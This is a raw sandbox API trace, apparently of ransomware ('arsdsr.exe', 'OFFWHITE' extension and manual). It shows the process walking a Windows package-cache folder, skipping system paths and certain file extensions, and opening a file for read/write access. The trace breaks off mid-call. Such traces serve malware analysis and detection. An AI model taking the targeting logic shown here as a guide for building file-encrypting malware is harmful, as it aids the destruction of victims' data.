-1 [0151.702] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\" [0151.702] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" [0151.702] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\" [0151.702] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\" [0151.702] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*" [0151.702] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0151.703] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.703] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0151.703] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.703] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.703] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="...") returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="windows") returned -1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="$recycle.bin") returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="rsa") returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="ntuser.dat") returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="programdata") returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="appdata") returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="program files") returned 1 [0151.703] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="program files (x86)") returned 1 [0151.703] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\" [0151.703] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\", lpString2="vcRuntimeAdditional_amd64" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" [0151.703] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\" [0151.703] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\" [0151.703] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" [0151.703] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0151.703] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.703] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0151.703] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.703] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.703] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdae7f300, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xdae7f300, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xdae7f300, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x59bde5, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0151.704] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0151.704] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\" [0151.704] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0151.704] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.704] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.704] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0151.704] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0151.704] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0151.704] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0151.704] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36fed00, ftCreationTime.dwHighDateTime=0x1d28825, ftLastAccessTime.dwLowDateTime=0x36fed00, ftLastAccessTime.dwHighDateTime=0x1d28825, ftLastWriteTime.dwLowDateTime=0x36fed00, ftLastWriteTime.dwHighDateTime=0x1d28825, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".") returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="..") returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="...") returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="windows") returned -1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="$recycle.bin") returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="rsa") returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="ntuser.dat") returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="programdata") returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="appdata") returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="program files") returned 1 [0151.704] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="program files (x86)") returned 1 [0151.704] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\" [0151.704] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", lpString2="vc_runtimeAdditional_x64.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" [0151.704] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.705] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.705] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0151.705] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0151.705] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36fed00, ftCreationTime.dwHighDateTime=0x1d28825, ftLastAccessTime.dwLowDateTime=0x36fed00, ftLastAccessTime.dwHighDateTime=0x1d28825, ftLastWriteTime.dwLowDateTime=0x36fed00, ftLastWriteTime.dwHighDateTime=0x1d28825, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0151.705] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0151.705] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0151.705] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0151.705] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0151.705] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.705] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{e52a6842-b0ac-476e-b48f-378a97a67346}", cAlternateFileName="{E52A6~1")) returned 1 [0151.705] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2=".") returned 1 [0151.705] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="..") returned 1 [0151.705] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="...") returned 1 [0151.705] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="windows") returned -1 [0151.705] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="$recycle.bin") returned 1 [0151.705] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="rsa") returned -1 [0151.706] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="ntuser.dat") returned -1 [0151.706] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="programdata") returned -1 [0151.706] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="appdata") returned -1 [0151.706] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="program files") returned -1 [0151.706] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="program files (x86)") returned -1 [0151.706] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0151.706] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{e52a6842-b0ac-476e-b48f-378a97a67346}" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" [0151.706] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\" [0151.706] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\" [0151.706] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0151.706] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.706] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.706] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.706] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.706] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.706] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xe9f9cff0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0151.706] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0151.706] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0151.706] lstrcmpiW (lpString1="state.rsm", lpString2="...") returned 1 [0151.706] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0151.706] lstrcmpiW (lpString1="state.rsm", lpString2="$recycle.bin") returned 1 [0151.706] lstrcmpiW (lpString1="state.rsm", lpString2="rsa") returned 1 [0151.706] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0151.706] lstrcmpiW (lpString1="state.rsm", lpString2="programdata") returned 1 [0151.706] lstrcmpiW (lpString1="state.rsm", lpString2="appdata") returned 1 [0151.707] lstrcmpiW (lpString1="state.rsm", lpString2="program files") returned 1 [0151.707] lstrcmpiW (lpString1="state.rsm", lpString2="program files (x86)") returned 1 [0151.707] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\" [0151.707] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" [0151.707] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.707] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.707] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".exe") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".log") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".cab") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".cmd") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".com") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".cpl") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".ini") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".dll") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".url") returned -1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".ttf") returned -1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".mp3") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".pif") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".mp4") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".OFFWHITE") returned 1 [0151.707] lstrcmpiW (lpString1=".rsm", lpString2=".msi") returned 1 [0151.707] lstrcmpiW (lpString1="state.rsm", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0151.707] GetProcessHeap () returned 0x500000 [0151.707] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526da8 [0151.707] CreateFileW (lpFileName="C:/Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0151.708] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=766) returned 1 [0151.708] GetProcessHeap () returned 0x500000 [0151.708] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0151.708] GetProcessHeap () returned 0x500000 [0151.708] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0151.708] GetProcessHeap () returned 0x500000 [0151.709] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0151.709] GetProcessHeap () returned 